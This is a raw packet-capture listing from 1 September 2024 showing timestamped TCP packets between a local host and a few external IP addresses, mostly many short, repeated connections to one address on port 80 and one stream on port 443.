Sep 1, 2024 06:31:21.158986092 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.158998013 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.159100056 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.180260897 CEST	80	49965	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:21.180923939 CEST	49965	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:21.229389906 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.229407072 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.229525089 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.229546070 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.233501911 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.233520985 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.233609915 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.233609915 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.233627081 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.233791113 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.235739946 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.235752106 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.235873938 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.235887051 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.237937927 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.241224051 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.241236925 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.241312027 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.241312027 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.241326094 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.246941090 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.247210979 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.247224092 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.247392893 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.247406960 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.249953032 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.252104044 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.252115965 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.252232075 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.252244949 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.252931118 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.256654024 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.256669998 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.256778955 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.256792068 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.259838104 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.259857893 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.260093927 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.260108948 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.261951923 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.295933962 CEST	49965	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:21.297853947 CEST	49966	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:21.301224947 CEST	80	49965	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:21.303278923 CEST	80	49966	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:21.306910038 CEST	49965	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:21.306910038 CEST	49966	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:21.307039022 CEST	49966	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:21.314483881 CEST	80	49966	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:21.320759058 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.320772886 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.320858955 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.320858955 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.320880890 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.321938992 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.323297024 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.323309898 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.323446989 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.323478937 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.324965954 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.325269938 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.325314999 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.325339079 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:21.325372934 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.330979109 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.331945896 CEST	49964	443	192.168.2.5	13.107.246.40
Sep 1, 2024 06:31:21.331970930 CEST	443	49964	13.107.246.40	192.168.2.5
Sep 1, 2024 06:31:22.062796116 CEST	80	49966	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:22.062853098 CEST	49966	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:22.065906048 CEST	49966	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:22.066219091 CEST	49967	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:22.071048975 CEST	80	49966	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:22.071099997 CEST	49966	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:22.071279049 CEST	80	49967	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:22.071332932 CEST	49967	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:22.071489096 CEST	49967	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:22.076463938 CEST	80	49967	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:22.830550909 CEST	80	49967	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:22.830626011 CEST	49967	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:22.937712908 CEST	49967	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:22.940891981 CEST	49968	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:22.943007946 CEST	80	49967	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:22.945019007 CEST	49967	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:22.945909977 CEST	80	49968	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:22.946017027 CEST	49968	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:22.949197054 CEST	49968	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:22.954365969 CEST	80	49968	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:23.723573923 CEST	80	49968	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:23.724904060 CEST	49968	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:23.727382898 CEST	49968	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:23.727425098 CEST	49969	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:23.733114004 CEST	80	49968	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:23.733194113 CEST	80	49969	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:23.733206987 CEST	49968	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:23.733344078 CEST	49969	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:23.737210035 CEST	49969	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:23.742069006 CEST	80	49969	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:24.476268053 CEST	80	49969	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:24.476316929 CEST	49969	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:24.496670008 CEST	49763	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:31:24.496689081 CEST	443	49763	142.250.65.238	192.168.2.5
Sep 1, 2024 06:31:24.496701002 CEST	49764	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:31:24.496715069 CEST	443	49764	142.250.65.238	192.168.2.5
Sep 1, 2024 06:31:24.595343113 CEST	49969	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:24.595782995 CEST	49970	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:24.600514889 CEST	80	49969	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:24.600560904 CEST	49969	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:24.601022959 CEST	80	49970	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:24.601084948 CEST	49970	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:24.601476908 CEST	49970	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:24.606378078 CEST	80	49970	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:25.352988958 CEST	80	49970	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:25.353138924 CEST	49970	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:25.355751038 CEST	49970	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:25.356020927 CEST	49971	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:25.360944033 CEST	80	49970	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:25.361119032 CEST	49970	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:25.361279011 CEST	80	49971	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:25.361381054 CEST	49971	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:25.361591101 CEST	49971	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:25.366435051 CEST	80	49971	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:26.124505043 CEST	80	49971	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:26.124556065 CEST	49971	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:26.234529972 CEST	49971	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:26.234906912 CEST	49972	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:26.239602089 CEST	80	49971	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:26.239645958 CEST	49971	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:26.240006924 CEST	80	49972	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:26.240062952 CEST	49972	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:26.240192890 CEST	49972	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:26.245161057 CEST	80	49972	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:26.245954990 CEST	49972	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:26.250565052 CEST	49973	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:26.255398035 CEST	80	49973	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:26.255454063 CEST	49973	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:26.259596109 CEST	49973	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:26.264519930 CEST	80	49973	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:27.002676010 CEST	80	49973	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:27.005119085 CEST	49973	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:27.110750914 CEST	49974	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:27.110750914 CEST	49973	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:27.115590096 CEST	80	49974	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:27.115789890 CEST	49974	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:27.116046906 CEST	80	49973	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:27.116245031 CEST	49973	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:27.117278099 CEST	49974	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:27.122041941 CEST	80	49974	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:28.036881924 CEST	80	49974	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:28.036931992 CEST	49974	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:28.040272951 CEST	49974	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:28.040638924 CEST	49975	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:28.045830011 CEST	80	49974	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:28.045870066 CEST	49974	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:28.046267033 CEST	80	49975	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:28.046343088 CEST	49975	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:28.046536922 CEST	49975	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:28.051558971 CEST	80	49975	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:28.795907974 CEST	80	49975	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:28.795969009 CEST	49975	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:28.906056881 CEST	49975	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:28.906392097 CEST	49976	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:28.911425114 CEST	80	49976	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:28.911437035 CEST	80	49975	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:28.911489964 CEST	49975	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:28.911501884 CEST	49976	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:28.911683083 CEST	49976	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:28.916771889 CEST	80	49976	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:29.662532091 CEST	80	49976	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:29.662910938 CEST	49976	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:29.665368080 CEST	49976	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:29.665368080 CEST	49977	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:29.672041893 CEST	80	49977	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:29.672131062 CEST	49977	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:29.672588110 CEST	80	49976	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:29.672610998 CEST	49977	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:29.674937963 CEST	49976	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:29.677589893 CEST	80	49977	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:30.422321081 CEST	80	49977	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:30.422385931 CEST	49977	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:30.530440092 CEST	49977	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:30.530822039 CEST	49978	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:30.537203074 CEST	80	49977	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:30.537252903 CEST	49977	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:30.537713051 CEST	80	49978	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:30.537775040 CEST	49978	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:30.537889957 CEST	49978	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:30.546063900 CEST	80	49978	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:31.314804077 CEST	80	49978	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:31.314891100 CEST	49978	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:31.318859100 CEST	49978	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:31.318876982 CEST	49979	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:31.325059891 CEST	80	49979	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:31.326000929 CEST	80	49978	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:31.326999903 CEST	49978	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:31.326999903 CEST	49979	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:31.330878019 CEST	49979	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:31.338376045 CEST	80	49979	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:32.077657938 CEST	80	49979	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:32.077719927 CEST	49979	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:32.182590008 CEST	49979	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:32.182930946 CEST	49980	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:32.188169956 CEST	80	49980	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:32.188225031 CEST	49980	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:32.188265085 CEST	80	49979	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:32.188349962 CEST	49979	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:32.188500881 CEST	49980	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:32.194823027 CEST	80	49980	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:32.950912952 CEST	80	49980	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:32.955130100 CEST	49980	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:32.955130100 CEST	49980	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:32.956855059 CEST	49981	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:32.960582972 CEST	80	49980	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:32.961769104 CEST	80	49981	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:32.961798906 CEST	49980	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:32.965307951 CEST	49981	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:32.968940020 CEST	49981	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:32.974116087 CEST	80	49981	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:33.732417107 CEST	80	49981	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:33.732955933 CEST	49981	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:33.844882965 CEST	49981	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:33.849014997 CEST	49982	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:33.851449966 CEST	80	49981	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:33.853151083 CEST	49981	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:33.854141951 CEST	80	49982	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:33.856962919 CEST	49982	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:33.857094049 CEST	49982	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:33.862648010 CEST	80	49982	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:34.606365919 CEST	80	49982	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:34.606446981 CEST	49982	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:34.608866930 CEST	49982	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:34.609160900 CEST	49983	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:34.616555929 CEST	80	49982	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:34.616569996 CEST	80	49983	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:34.616612911 CEST	49982	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:34.616656065 CEST	49983	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:34.616754055 CEST	49983	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:34.621973991 CEST	80	49983	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:35.392832994 CEST	80	49983	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:35.393080950 CEST	49983	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:35.500591993 CEST	49983	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:35.500600100 CEST	49984	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:35.505495071 CEST	80	49984	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:35.505744934 CEST	80	49983	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:35.508981943 CEST	49983	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:35.508992910 CEST	49984	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:35.509192944 CEST	49984	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:35.514156103 CEST	80	49984	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:36.338057995 CEST	80	49984	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:36.338113070 CEST	49984	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:36.342086077 CEST	49984	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:36.342534065 CEST	49985	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:36.347280979 CEST	80	49984	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:36.347327948 CEST	49984	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:36.347681046 CEST	80	49985	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:36.347738981 CEST	49985	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:36.347887039 CEST	49985	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:36.352931976 CEST	80	49985	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:37.103620052 CEST	80	49985	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:37.105071068 CEST	49985	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:37.219909906 CEST	49985	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:37.220321894 CEST	49986	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:37.225315094 CEST	80	49985	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:37.225446939 CEST	80	49986	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:37.225469112 CEST	49985	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:37.225584030 CEST	49986	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:37.225764036 CEST	49986	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:37.231348038 CEST	80	49986	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:37.966912985 CEST	80	49986	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:37.966967106 CEST	49986	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:37.970134020 CEST	49986	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:37.970668077 CEST	49987	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:37.976376057 CEST	80	49986	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:37.976423025 CEST	49986	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:37.976897955 CEST	80	49987	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:37.976985931 CEST	49987	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:37.977145910 CEST	49987	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:37.984587908 CEST	80	49987	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:38.728245974 CEST	80	49987	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:38.728322983 CEST	49987	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:38.844475031 CEST	49987	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:38.844865084 CEST	49988	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:38.849540949 CEST	80	49987	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:38.849585056 CEST	49987	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:38.849776030 CEST	80	49988	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:38.849828005 CEST	49988	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:38.849937916 CEST	49988	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:38.855144024 CEST	80	49988	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:39.589452982 CEST	80	49988	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:39.589569092 CEST	49988	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:39.592775106 CEST	49988	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:39.593127012 CEST	49989	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:39.598400116 CEST	80	49989	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:39.598536968 CEST	80	49988	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:39.598689079 CEST	49989	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:39.598692894 CEST	49988	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:39.598917961 CEST	49989	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:39.604406118 CEST	80	49989	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:40.343498945 CEST	80	49989	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:40.343550920 CEST	49989	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:40.456001043 CEST	49989	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:40.456396103 CEST	49990	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:40.461294889 CEST	80	49989	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:40.461345911 CEST	49989	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:40.461553097 CEST	80	49990	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:40.461612940 CEST	49990	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:40.461919069 CEST	49990	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:40.468369007 CEST	80	49990	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:41.236097097 CEST	80	49990	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:41.236207008 CEST	49990	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:41.239415884 CEST	49990	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:41.239866972 CEST	49991	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:41.245017052 CEST	80	49990	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:41.245275021 CEST	49990	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:41.245276928 CEST	80	49991	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:41.245951891 CEST	49991	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:41.254877090 CEST	49991	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:41.263123989 CEST	80	49991	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:42.007657051 CEST	80	49991	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:42.007709980 CEST	49991	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:42.124459028 CEST	49991	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:42.124869108 CEST	49992	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:42.131571054 CEST	80	49991	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:42.131619930 CEST	49991	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:42.131803989 CEST	80	49992	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:42.131861925 CEST	49992	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:42.132004976 CEST	49992	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:42.139599085 CEST	80	49992	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:42.889067888 CEST	80	49992	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:42.889146090 CEST	49992	80	192.168.2.5	185.215.113.19
